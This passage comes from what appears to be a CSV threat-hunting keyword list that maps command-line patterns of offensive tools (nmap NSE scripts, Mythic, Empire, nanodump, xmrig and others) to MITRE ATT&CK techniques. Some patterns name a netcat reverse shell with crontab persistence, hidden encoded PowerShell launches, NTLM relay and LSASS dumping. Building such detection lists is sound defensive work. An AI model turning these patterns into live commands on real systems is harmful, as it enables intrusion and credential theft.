T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* mysql-audit.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* mysql-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* mysql-databases.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* mysql-dump-hashes.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* mysql-empty-password.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* mysql-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* mysql-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* mysql-query.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* mysql-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* mysql-variables.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* mysql-vuln-cve2012-2122.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* mystikal.py*,offensive_tool_keyword,Mystikal,macOS Initial Access Payload Generator,T1059.005 - T1204.002 - T1566.001,TA0002 - TA0001,N/A,N/A,Exploitation tools,https://github.com/D00MFist/Mystikal,1,0,N/A,9,3,245,35,2023-05-10T15:21:26Z,2021-05-03T14:46:16Z -* mythic start*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,0,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -* mythic_container.Mythic*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,0,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -* mythic_payloadtype_container*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,0,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -* mythic-cli*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,0,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -* -n *TotallyLegitTool*,offensive_tool_keyword,InvisibilityCloak,Proof-of-concept obfuscation toolkit for C# post-exploitation tools,T1027 - T1059.003 - T1140 - T1107,TA0004 - TA0005 - TA0009,N/A,N/A,Defense Evasion,https://github.com/h4wkst3r/InvisibilityCloak,1,0,N/A,N/A,4,375,147,2022-07-22T14:13:53Z,2021-05-19T14:19:49Z -* --name covenant *,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,0,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -* nanodump*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,0,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -* nanodump/*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,0,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -* nat-pmp-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* nat-pmp-mapport.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* nbd-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -NBNSBruteForce*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,0,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -* nbns-interfaces.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -NBNSTTL *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* nbstat.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ncat * -e /bin/bash*|crontab*,greyware_tool_keyword,ncat,reverse shell persistence,T1059.004 - T1053.005 - T1059.005,TA0002 - TA0005,N/A,N/A,Persistence,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -* ncp-enum-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ncp-serverinfo.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ndmp-fs-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ndmp-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --neo4j-host *--neo4j-port*,offensive_tool_keyword,sprayhound,Password spraying tool and Bloodhound integration,T1110.003 - T1210.001 - T1069.002,TA0006 - TA0007 - TA0003,N/A,N/A,Credential Access,https://github.com/Hackndo/sprayhound,1,0,N/A,N/A,2,136,12,2023-02-15T11:26:53Z,2020-02-06T17:45:37Z -* nessus-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* nessus-xmlrpc-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* netbus-auth-bypass.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* netbus-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* netbus-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* netbus-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --netcat-port *,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,0,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -* netripper*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* netscan.exe *,greyware_tool_keyword,softperfect networkscanner,SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell,T1046 - T1065 - T1135 ,TA0007 ,N/A,N/A,Discovery,https://www.softperfect.com/products/networkscanner/,1,0,N/A,8,10,N/A,N/A,N/A,N/A -* --NewCertPath *.pfx --NewCertPassword *,offensive_tool_keyword,ForgeCert,ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.,T1553.002 - T1136.003 - T1059.001,TA0006 - TA0002,N/A,N/A,Defense Evasion,https://github.com/GhostPack/ForgeCert,1,0,N/A,10,6,538,87,2022-10-07T18:18:09Z,2021-06-09T22:04:18Z -* NewLocalAdmin(*,offensive_tool_keyword,SharpGPOAbuse,SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.,T1546.008 - T1204 - T1134 ,TA0007 - TA0008 - TA0003 - TA0004 ,N/A,N/A,Defense Evasion,https://github.com/FSecureLABS/SharpGPOAbuse,1,0,N/A,N/A,9,855,130,2020-12-15T14:48:31Z,2019-04-01T12:10:25Z -* nexpose-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* nfs-ls.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* nfs-showmount.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* nfs-statfs.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --nicehash *--coin *,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -* nikto.pl *,offensive_tool_keyword,nikto,Nikto web server scanner,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/sullo/nikto,1,1,N/A,N/A,10,7136,1096,2023-09-18T14:44:28Z,2012-11-24T04:24:29Z -* nimcrypt*,offensive_tool_keyword,nimcrypt,Nimcrypt is a .NET PE Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project,T1027 - T1055 - T1099 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/icyguider/nimcrypt,1,0,N/A,N/A,1,83,5,2021-03-25T00:27:12Z,2021-03-24T17:51:52Z -* Ninja.py*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,0,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -* nje-node-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* nje-pass-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --nla-redirection-host * --nla-redirection-port *,offensive_tool_keyword,pyrdp,RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact,T1550.002 - T1059.006 - T1071.001,TA0002 - TA0010,N/A,N/A,Sniffing & Spoofing,https://github.com/GoSecure/pyrdp,1,0,can also be used by blueteam as a honeypot,10,10,1296,235,2023-07-28T14:33:09Z,2018-09-07T19:17:41Z -* nntp-ntlm-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -NoBase64 *,offensive_tool_keyword,empire,empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1061,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* --no-bruteforce *,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* --no-bruteforce --continue-on-success*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* --no-http-server -smb2support -t * -c *,offensive_tool_keyword,AD exploitation cheat sheet,Example command to relay the hash to authenticate as local admin (if the service account has these privileges) and run calc.exe. Omit the -c parameter to attempt a secretsdump instead.,T1550 - T1555 - T1212 - T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --nomain -d:exportDll --passL:*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,0,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -* --no-net*,offensive_tool_keyword,blackcat ransomware,BlackCat Ransomware behavior,T1486.001 - T1489 - T1490 - T1486,TA0011 - TA0010 - TA0012 - TA0007 - TA0040,blackcat ransomware,N/A,Ransomware,https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -NoP -sta -NonI -W Hidden -Enc *,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -* -no-pass -dns-tcp -nameserver*,offensive_tool_keyword,Certipy,Tool for 